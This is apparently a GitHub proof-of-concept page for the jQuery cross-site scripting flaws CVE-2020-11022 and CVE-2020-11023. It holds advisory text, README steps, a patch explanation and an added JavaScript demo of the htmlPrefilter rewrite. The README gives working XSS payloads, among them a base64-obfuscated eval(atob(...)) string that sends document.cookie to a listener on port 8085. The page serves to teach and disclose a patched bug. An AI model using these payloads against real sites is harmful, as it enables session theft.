
CVE-2020-11022 PoC: jQuery Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
Title: jQuery Cross-Site Scripting Vulnerability (CVE-2020-11022)
Description: jQuery is an open-source, cross-browser JavaScript library originally written by John Resig. It simplifies working with HTML from JavaScript and is modular and extensible through plugins. jQuery versions from 1.2 up to, but not including, 3.5.0 contain a cross-site scripting vulnerability. The root cause is not the application's input validation alone: before parsing an HTML string passed to its DOM manipulation methods, jQuery rewrites it in `jQuery.htmlPrefilter` (expanding self-closing tags such as `<x/>` into `<x></x>`), so markup that was inert when it was sanitized can become executable after the rewrite. An attacker can exploit this to run script in the victim's browser.
Description
A small script put together quickly to demonstrate this CVE.
Readme
# CVE-2020-11022 CVE-2020-11023

> In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

> In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

#### Exploit 

1. Host `index.php` on a PHP web server. From the repository directory, `sudo php -S 127.0.0.1:80` spins up a quick one (root is only needed because port 80 is privileged). 

#### Simple XSS 

2. Visit the path [http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=alert(1)%3E](http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=alert(1)%3E). URL-decoded, the `value` parameter is `/><img src=x onerror=alert(1)>`.
3. Press the "Append via .html()" button. 
4. See the alert pop. The `/>` closes the tag that `value` was embedded in once jQuery's prefilter has expanded it, the `<img src=x ...>` that follows becomes a real element, the bogus `src` fails to load, and its `onerror` handler runs.

![image](https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023/raw/main/xss.png)

#### Cookie stealing 

2. Start a second web server on port 8085 to receive the exfiltrated cookie, for example `python3 -m http.server 8085` (no root needed for a high port).
3. Visit the path [http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=eval(atob(%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly8xMjcuMC4wLjE6ODA4NS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==%27))%3E](http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=eval(atob(%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly8xMjcuMC4wLjE6ODA4NS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==%27))%3E). The base64 string decodes to `document.location="http://127.0.0.1:8085/?c="+document.cookie`; it is wrapped in `eval(atob(...))` so that the payload contains no quotes or slashes that the URL or the page's markup would break on.
4. Press the "Append via .html()" button. 
5. Check the Python server's log: the request line contains the victim's cookie in the `c` query parameter. Note that `document.cookie` does not expose cookies set with the `HttpOnly` flag, so those will not appear in the log. 

![image](https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023/raw/main/cookie.png)

#### Fix

If you'd like to fix this CVE in this script, change the jQuery `<script>` source to <https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.js> (or any later release) :) . What 3.5.0 changes is the pre-parsing step: `jQuery.htmlPrefilter` becomes a no-op, so self-closing tags inside an HTML string are no longer expanded into open/close pairs. Overriding `jQuery.htmlPrefilter` to return its input unchanged has the same effect on older versions for this self-closing-tag case, but it does not address the `<option>` handling of CVE-2020-11023, so upgrading is the real fix.
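The transformation behind both the exploit steps above and the fix can be reproduced without a browser. The following is an added example, not code from the PoC repository or from jQuery itself: it copies the pre-3.5.0 `htmlPrefilter` regex and replacement from jQuery 3.4.1, the 3.5.0 identity version next to it, and a small quote-aware scan to tell "`onerror` inert inside an attribute value" from "`onerror` on a real tag". The wrapper template (`<img alt="<x" title="VALUE">`) is an assumption, since `index.php` is not shown on this page; the `value` payload is the README's own.

```javascript
// Added example (not the PoC's or jQuery's own code). Shows why a string
// that is harmless when sanitized becomes XSS once jQuery < 3.5.0 has
// pre-processed it, and that the 3.5.0 no-op leaves it harmless.

// Copied from jQuery 3.4.1 src/manipulation.js: expand "<tag .../>" into
// "<tag ...></tag>". The lookahead exempts only real void elements.
const rxhtmlTag =
  /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi;

// jQuery < 3.5.0
function htmlPrefilterPre35(html) {
  return html.replace(rxhtmlTag, "<$1></$2>");
}

// jQuery >= 3.5.0: the string is handed to the HTML parser unchanged.
function htmlPrefilterPost35(html) {
  return html;
}

// ASSUMED application template: the untrusted value is placed into a
// quoted title attribute of an <img> that a sanitizer would allow.
// The "<x" in alt= is the attacker-controlled prefix from the advisory
// payload; index.php on the page is not shown, so this is a stand-in.
function buildUntrustedHtml(value) {
  return '<img alt="<x" title="' + value + '">';
}

// Minimal quote-aware scan (not an HTML parser): returns true only when
// "onerror=" appears inside a tag and outside any quoted attribute value,
// i.e. where a browser would actually attach the handler.
function hasTopLevelOnerror(html) {
  let inTag = false;
  let quote = null;
  for (let i = 0; i < html.length; i++) {
    const ch = html[i];
    if (quote) {
      if (ch === quote) quote = null;
      continue;
    }
    if (inTag && (ch === '"' || ch === "'")) {
      quote = ch;
      continue;
    }
    if (ch === "<") inTag = true;
    else if (ch === ">") inTag = false;
    else if (inTag && html.startsWith("onerror=", i)) return true;
  }
  return false;
}

// The README's payload, as it arrives in the `value` query parameter.
const README_VALUE = "/><img src=x onerror=alert(1)>";

// Runs the payload through both prefilter versions and reports whether
// the result carries a live onerror handler.
function demo(value) {
  const untrusted = buildUntrustedHtml(value);
  const pre35 = htmlPrefilterPre35(untrusted);
  const post35 = htmlPrefilterPost35(untrusted);
  return {
    untrusted,
    pre35,
    post35,
    vulnerableBefore: hasTopLevelOnerror(untrusted),
    vulnerableAfterPre35: hasTopLevelOnerror(pre35),
    vulnerableAfterPost35: hasTopLevelOnerror(post35),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(README_VALUE), null, 2));
}
```

With the README's value, the pre-3.5.0 output is `<img alt="<x" title="></x"><img src=x onerror=alert(1)>">`: the regex matched `<x" title="/>` as a self-closing tag named `x"`, emitted `<x" title="></x">`, and in doing so closed the quoted attribute early, so the trailing `<img src=x onerror=alert(1)>` is now a standalone element. The 3.5.0 version returns the string untouched and the handler stays inside the attribute value.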
File Snapshot

/data/pocs/b10a401f429d63b7efab4263f2a811f18edb11eb
├── [ 26K] cookie.png
├── [ 806] index.php
├── [1.9K] README.md
└── [ 33K] xss.png

0 directories, 4 files